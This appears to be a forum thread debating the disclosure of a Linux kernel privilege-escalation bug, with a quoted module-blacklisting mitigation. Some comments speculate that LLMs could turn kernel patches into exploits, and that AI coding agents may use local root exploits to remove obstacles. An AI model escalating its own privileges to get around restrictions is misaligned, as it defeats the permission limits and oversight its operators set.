Texlive it's huge (full instal it's over 7GB) and the so-called free FSDG is not 100% free, at all. With just that GNU Emacs would be truely GNU-standalone, relying on GNU tools for plots under Emacs' Calc and Texinfo books exported into PDF. A good plus for security.
Once you get that working, the rest would just follow their way. Also, GNU Hurd being developed with propietary LLM's/SAAS it's a disgrace against what GNU stands for too. They can go back to the right path, but they need will, for sure.
LPEs on Linux are obscenely commonplace.
I'm honestly unaware of what systems could be put in place to prevent this but expecting people to always do the right thing is fantasy level thinking. I mean I bet the disclosers thought they were doing the right thing, hence why it's a bad thing to rely on.
edit: spelling/grammer.
The kernel security team was given the heads up a month ago. At that point it is their decision.
It's fundamentally their position to not work the way that you describe.
I'd start with Greg's own words. You can probably find more on it from Spender/grsecurity's blog.
Partly they have a strong belief that all kernel bugs are vulnerabilities and all vulnerabilities are just bugs; sometimes taken to the extreme in both ways (on one hand this case where the vulnerability is almost ignored; on the other hand, I saw cases where a VM panic that could be triggered only by a misbehaving host—which could just choose to stop executing the VM—was given a CVE).
The reason they don't is because Linus and Greg have repeatedly, publicly stated that they don't want to because they don't believe that vulnerabilities conceptually make sense for the linux kernel and they refuse to engage in the process.
That's exactly what I wrote: "they have a strong belief that all kernel bugs are vulnerabilities and all vulnerabilities are just bugs; sometimes taken to the extreme in both ways".
But there is also a question of bandwidth. If a maintainer asks to bring a specific vulnerability to distros-list, the kernel security people will be reasonable. I did it last March.
For a first approximation: Ubuntu, Debian, RHEL(-derived) to begin with, and SuSE which is in EU/server space (AIUI):
* https://commandlinux.com/statistics/most-popular-linux-distr...
* https://commandlinux.com/statistics/linux-server-market-shar...
Seems like Gentoo, Arch, Mint, and Slackware could also be as well:
* https://distrowatch.com/dwres.php?resource=major
U/Deb/RHEL are 'upstream' of a lot of other projects, and fixes would trickle down to Rocky, Alma, etc. Perhaps VM OS in cloud (AWS, Azure) could be a usage gauge as well.
But publishing a working exploit together with the disclosure before patches are available is really really irresponsible, maybe even criminal.
And no, the proposed mitigations don't help with half of the distributions out there...
What’s your theory here? What crime?
Also, all kinds of aiding and abetting.
Copying from the comment I was replying to:
> But publishing a working exploit together with the disclosure before patches are available is really really irresponsible, maybe even criminal
But it’s not the law anywhere I’m aware of today, and I’d not support it becoming a law.
Instead of that, you’d rather make the law compel free individuals to limit their speech, or to hand over their work to big companies privately, so big companies can save money?
That doesn’t sound like a nice future, if it’s even enforceable at all.
That's besides the point. If people use the official mitigation on https://copy.fail/#mitigation they will not sufficiently protect themselves on mainstream distros like Ubuntu and Debian.
The page also states
> Most major distributions are shipping the fix now.
This text was probably prepared in advance, but this was simply not true at the time of publication.
Edit: As of this writing, most distros including Redhat, Fedora, Debian Stable, do not have patches available in the package repos, though they're being actively worked on.
Considering that the patches have been available for a while, someone surely reversed what they were for and was actually exploiting this in the wild.
In the age of AI, I’d argue that “responsible disclosure” is dead. Arguably even in closed source projects. Just ask Claude to do a diff between the previous version and to see whether anything fixed in there could have had security implications.
We’re not there yet, but very soon the only way to responsibly disclose a vulnerability will be immediately.
Linux kernel is one of the most audited open-source projects ever. I guarantee you that someone did reverse the patch.
> but forgot to tell the distros
Probably an oversight, but irrelevant. The bug was in the linux kernel. It's insane to suggest that they should have notified everyone shipping the linux kernel.
With the way linux is used these days, I'd guess the number of systems with untrusted local users is pretty limited. Even with shared hosting, you generally have root in your VM or container anyway. Unless this enables an escape from that?
Still the risk that people who run "curl | bash" without care could get bitten, but usually its "curl | sudo bash" anyway...
Lots of shared hosters don't use VMs or containers. It's some arbitrary number of people logging in to a shared system, each one with a home directory under /home/THE_USER_NAME. i've had several such hosters over the years (thankfully not right now, though).
Things like HPC clusters are multiuser & don't entirely trust their users. If they did we wouldn't need users/groups/permissions etc in the first place.
And then there are users running claude-cli and friends who may just find it convenient to use a local root exploit to remove obstacles.
So containers don't protect you, only a VM.
How so?
But even if you think making unethical decisions in personal self interest is something no one should be criticized for, surely the Linux kernel team ought to have some process for notifying the top distributions of an upcoming LPE, just out of practicality.
Distros are downstream of kernel, that doesn’t entitle them to expect to be contacted directly by every security reporter. That’s not on them. Distros that are big enough should be plugged into the linux security team for notifications.
Security researchers cannot be held responsible for broken lines of communication within the org charts of projects that they study. They’re providing a valuable public service already, how much more do you want?
Yes it does. That's how it's always been done and distros can ship a fix well before it ends up in a kernel release.
Any strategy that assumes that the rest of the world is functional or makes you personally responsible for fixing all of it is equally broken but there is a reasonable middle ground and sending a few more emails lies within it
> we can always help them by mandating that they spend 6 figures
Who’s we? Mandate with what authority?AWS and GCP are downstream another level. Should the reporter also have worked with them? And their customers? And the customers of their customers?
IMO this whole discussion seems like people are annoyed by the security researchers doing god’s work and wish they didn’t exist or think that they should be fully subservient to the projects and companies they are helping for free. The bugs were there before the researchers revealed them!!
Most people in tech think like the techie in this comic strip.
A large percentage of kernel fixes have the potential to be similarly bad. For some the potential isn't even realized until after the fix has shipped.
Ever stable release GregKH says you must upgrade now, because there is something security relevant in there. This happens at least once a week.
As for shared hosting providers it is my sense that there is always at least one local privilege escalation available to miscreants. Making shared hosting only safe if there is a certain amount of trust.
I remember bugs that were similarly bad from my university days 30+ years ago. Has anything substantially changed?
I'd consider a shared hoster which allows users to run their own (native) code and doesn't use VMs for tenant isolation extremely irresponsible in 2026.
I could equally ask: "Who knows how many attackers learned about this vulnerability from this disclosure, and used it before the distributions fixed it?"
So maybe folks should take a break from the kind of armchair quarterbacking that this was “incredibly irresponsible”, as was done upthread, or that the researchers should be blacklisted for life, as a parallel commenter stated.
The hilarious bit is that the idea that they needed to coordinate is clearly broken even in just this example. They did give prior notice to the Linux developers, who issued a patch. And they’re still getting raked over the coals in this comment page by armchair quarterbacks who have decided they needed to coordinate with specific distros. If they’d coordinated with those distros, somebody would have a pet distro that didn’t make the cut and they’d be pissed about that.
There are risks no matter how they do it, and there will be people who are pissed no matter how they do it. Security researchers don’t owe anybody a specific methodology.
So I feel like the argument reduces into "why is it a problem that now anyone could exploit it, if some people were exploiting it already". Which imho isn't a sensible argument because the issue is clearly the amount of people capable of using the exploit for nefarious purposes, which has increased.
“Because we can’t know if there was exploitation by existing parties who had discovered the vulnerability on their own, there are upsides to disclosing earlier so that affected users can take mitigating steps and review their systems for indicators of compromise. Additionally, the more projects the researchers pull into the loop for coordinated disclosure, the higher the likelihood that they further leak the vulnerability to more attackers.”
However the issue is that we cannot know if the attack space has been broadened or lessened as a consequence of this disclosure, because of how eager it was. If it wasn't eager then we could much more comfortable in suggesting that the attack space has probably been reduced.
Given the exploit had been living in the linux code base undetected for so long in the first place, I think its fair to state that disclosing the exploit prior to the distributions being ready and given the distributions are the principal attack vector of the exploit: that the researcher has made the situation worse and should reflect on their actions.
The idea about the available exploit space and how the actors within it might, or might not move is a much more interesting avenue of conversation and I thank you for elaborating on your initial comment. <3
I do however feel that its hard to be confident about whether or not the attack space has been increased or reduced as a consequence of the eager disclosure. I feel we could make the case either way.
Anything else inevitably has worse for the public good.
Having spent that entire time and then some on both offensive and defensive teams, I assure you longer delays after notification do NOT decrease the overall risk to the public.
There's a reason we've landed where we have as a security community.
It's an advertisement for an unpatched critical exploit and apparently some kind of infosec company.
And if you disclose to just a handful, why ignore the rest?
The disclosure is private. Meaning neither the commit messages nor any public info can leak too much information about the bug. It's usually kept rather discrete.
It is impractical for the kernel to broadcast to all its users privately.
Meaning that either a) distro maintainers should be privy to it, but where does this end?[1] or b) we have the current situation
[1] probably the top 5 distros security teams can just be copied into the private mail. Maybe the kernel security private list can forward the emails to them as well.
Problem is, every other type of communication between distros and kernel is implicit. In commit messages, patches and release notes. So it's an exceptional case.
BTW, with LLMs there's a new issue. It is now cheap to scan the kernel commit log maybe in _next and ask it to identify what could be a patch for a private disclosure. And then immediately RE the patch and exploit it on deployed kernels.
That is unfortunately not true. i left my last one only a few years ago and they're still going strong without me.
None? Because nobody* does hosting using Linux users as a security boundary. It's not the 90s.
* Standard HN disclaimer for people that think that some retro shell box with 10 users disproves "nobody": nobody does not literally mean exactly 0 people in this context.
Maybe it is irresponsible how little attention we pay to software security. Maybe, software developers of all kind should spend an entire year not developing any features at all, but fix all the tech debt of 30 years instead.
Yes, that sounds revolutionary, but I do not see an alternative in an age where all you need to find kernel bugs of this scale with AI agents.
It's a total arsehole'y move to not share with open-source projects (like Debian) but for commercial vendors like Microsoft I don't give a crap.
Now let's not get carried away either: that's a privilege escalation, so it already requires access to a local account. We're not exactly in Jia Tan "I backdoor every SSH out there if your Linux distro is using systemd" territory either.
Maybe a decade of corporations with revenue in the billions, paying peanuts and coffee money, for critical vulnerability disclosures made it....
Yes, this was clearly a marketing stunt to promote Xint code.
I, for one, will never use Xint code and will advise everyone to never use it. To anyone working there: enjoy your 15 minutes, I hope this backfires right in your face.
External security research happens for one of only a few reasons typically:
1) hobbyists who are learning or just like to do it for fun 2) bug bounties (good luck with those in most open source) 3) marketing for security companies 4) non-public research going to CNO/CNE
If you want to kill 3, the output of 1 will not come close to 4 and the public is NOT better off with fewer public bugs.
It is a really really bad look for Linux, puts a bit of water on all hype around switching from Windows.
For single user systems (not rigorously defined, I presume it's the intersection of our two definitions which we might be talking about) the nature of the exploit is local privilege escalation, of which there could be many possible, and many mitigations / countermeasures against. This could have suddenly appeared from the ether of "unknown unknowns" for some people.
Those people farther up the food chain still potentially have service accounts, maybe even user accounts for some purposes, perhaps "trusted" services which deliver them code which they deserialize and run once. (Have a pickle.)
severity * impact * likelihood
Not everyone looking to migrate from Windows 95 plans to run everything as root afterward.
On the copy.fail site:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
Not everybody needs or wants to wait for their distro, or plans to patch their IC firmware when a config change will do.No OS is perfect. The awkward rollout for this bug fix is proof of that.
Said no one ever...present post excluded :-))
I disagree. Exploits should pe published as soon as they are written and found vulnerabilities to have as much details as possible, because if the researchers cannot write an exploit, someone else could.
- this has the advantage of forcing upgrades as soon as possible. No more “we need to see and schedule patching”
- publishing it as soon as possible makes everyne aware of the threat
- it is a learning experience for everyone
- “responsible disclosure” was invented by lazy companies that have zero interest in fixing a problem quickly